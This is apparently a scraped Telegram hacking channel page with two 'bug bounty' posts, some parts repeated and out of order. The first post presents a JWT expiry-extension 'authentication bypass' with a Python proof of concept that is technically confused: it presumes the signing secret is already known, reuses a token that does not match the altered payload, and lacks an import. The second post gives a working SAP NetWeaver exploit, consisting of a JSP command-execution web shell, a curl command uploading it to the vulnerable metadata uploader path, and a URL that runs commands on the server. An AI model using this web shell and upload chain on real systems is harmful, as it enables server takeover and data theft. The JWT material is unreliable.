This will generate a new JWT token with a longer expiration time. We can use this token to bypass authentication:
PoC Code
Note: This is just a basic example and should not be used in production. In a real-world scenario, you should use a more sophisticated approach to bypass authentication.
That's all, friends!
Happy hacking and see you next time!π
#BugBounty
#ssrf
#sqli
#bypass
#wget #api
Let's assume we have a vulnerable API endpoint:
https://example.com/api/v1/usersThe API uses JSON Web Tokens (JWT) for authentication. We can use a tool like
Burp Suite to intercept and manipulate the JWT token.Step 1: Intercept JWT Token
Using Burp Suite, intercept the login request and capture the JWT token:
GET /api/v1/login HTTP/1.1
Host: example.com
Content-Type: application/json
{"username": "user", "password": "pass"}
Response:
HTTP/1.1 200 OK
Content-Type: application/json
{"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"}
Step 2: Analyze JWT Token
Using a tool like
jwt.io, we can analyze the JWT token and find the algorithm used (HS256) and the payload:{
"sub": "1234567890",
"name": "John Doe",
"iat": 1643723900,
"exp": 1644329700
}Step 3: Bypass Authentication
We can use a tool like
jwt_tool to generate a new JWT token with the same payload but with a longer expiration time (e.g., 1 year):jwt_tool --alg HS256 --payload '{"sub": "1234567890", "name": "John Doe", "iat": 1643723900, "exp": 2147483647}' --secret-key 'your_secret_key_here'This will generate a new JWT token with a longer expiration time. We can use this token to bypass authentication:
GET /api/v1/users HTTP/1.1
Host: example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
PoC Code
import jwt
# Load secret key
with open('secret_key.txt', 'r') as f:
secret_key = f.read().strip()
# Generate new JWT token with longer expiration time
payload = {'sub': '1234567890', 'name': 'John Doe', 'iat': 1643723900, 'exp': 2147483647}
new_token = jwt.encode(payload, secret_key, algorithm='HS256')
# Use new token to bypass authentication
headers = {'Authorization': f'Bearer {new_token.decode()}'}
response = requests.get('https://example.com/api/v1/users', headers=headers)
print(response.text)
Note: This is just a basic example and should not be used in production. In a real-world scenario, you should use a more sophisticated approach to bypass authentication.
That's all, friends!
Happy hacking and see you next time!π
#BugBounty
#ssrf
#sqli
#bypass
#wget #api
β€15π₯5π₯°5π1
Wide Spread: There are over 1200 SAP NetWeaver systems exposed to the internet worldwide that are at risk. βοΈ
Exploitation Examples:
π Uploading a malicious Web Shell to the folder
and then accessing it to execute commands via GET requests.
π Stealing sensitive customer or financial data.
π Disrupting business activities.
Lateral movement within the network and compromising other systems.
Attack Workflow:βοΈ
1.The attacker prepares a malicious file (e.g., a Web Shell, a JAR or ZIP file embedded with malicious code).
2.They send this file as part of an HTTP POST request to a path like:
3.The SAP NetWeaver server, due to the missing authorization check, accepts the file and stores/executes it as part of its system.
4.The attacker then follows up with an HTTP GET request to the Web Shell file (or executes Java code or other code), beginning their full control over the system.
5.The attacker can now execute any commands, steal data, or move laterally within the network.
5. Tools Used for Sending POST Requestsπ
Attackers use specialized tools that allow them to formulate and send HTTP requests manually or automatically. The most famous tools used are:
curl
π A command-line tool available on Linux (and all major systems) that allows sending custom HTTP/HTTPS requests.
π Example usage:
Burp SuiteπΌ
π An advanced penetration testing tool that allows the attacker or security tester to intercept, examine, and modify any HTTP request (GET/POST).
π They can modify requests directly through the UI or use tools like Repeater/Intruder to send multiple different requests and observe responses.
π Postman
π A comprehensive application for sending HTTP requests and API development. It allows sending files, modifying fields and headers, and analyzing responses.
π Often used for manual testing to see the response and repeat requests.
π Custom Scripts in Python/JavaScript
π An advanced attacker might write a custom script using libraries like requests (Python) or axios (JavaScript) to send automated POST requests according to their attack scenario.
Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.
1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example:
2. Send a POST Request to Upload the File
Using a tool like curl:
3. Access the File After Upload
Visit the path where the file is stored (example):
The command will be executed and the result returned on the page, confirming that the attacker has gained full control of the server.π―
Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal.π«
That's all, friends!
Happy hacking and see you next time!π
#BugBounty #ssrf
#sqli #bypass
#api
Exploitation Examples:
j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/
and then accessing it to execute commands via GET requests.
Lateral movement within the network and compromising other systems.
Attack Workflow:
1.The attacker prepares a malicious file (e.g., a Web Shell, a JAR or ZIP file embedded with malicious code).
2.They send this file as part of an HTTP POST request to a path like:
/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
3.The SAP NetWeaver server, due to the missing authorization check, accepts the file and stores/executes it as part of its system.
4.The attacker then follows up with an HTTP GET request to the Web Shell file (or executes Java code or other code), beginning their full control over the system.
5.The attacker can now execute any commands, steal data, or move laterally within the network.
5. Tools Used for Sending POST Requests
Attackers use specialized tools that allow them to formulate and send HTTP requests manually or automatically. The most famous tools used are:
curl
curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader
Burp Suite
6. Technical Steps for Exploitation (For Study & Understanding Only)β οΈ
Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.
1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example:
<% if (request.getParameter("cmd") != null) {
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
java.io.InputStream in = p.getInputStream();
int a = -1;
while((a=in.read())!=-1){
out.print((char)a);
}
in.close();
} %>2. Send a POST Request to Upload the File
Using a tool like curl:
curl -k -X POST \
-F "file=@webshell.jsp" \
https://target-sap-server/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader
3. Access the File After Upload
Visit the path where the file is stored (example):
https://target-sap-server/irj/go/km/docs/webshell.jsp?cmd=whoami
The command will be executed and the result returned on the page, confirming that the attacker has gained full control of the server.
Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal.
That's all, friends!
Happy hacking and see you next time!
#BugBounty #ssrf
#sqli #bypass
#api
Please open Telegram to view this post
VIEW IN TELEGRAM
β€25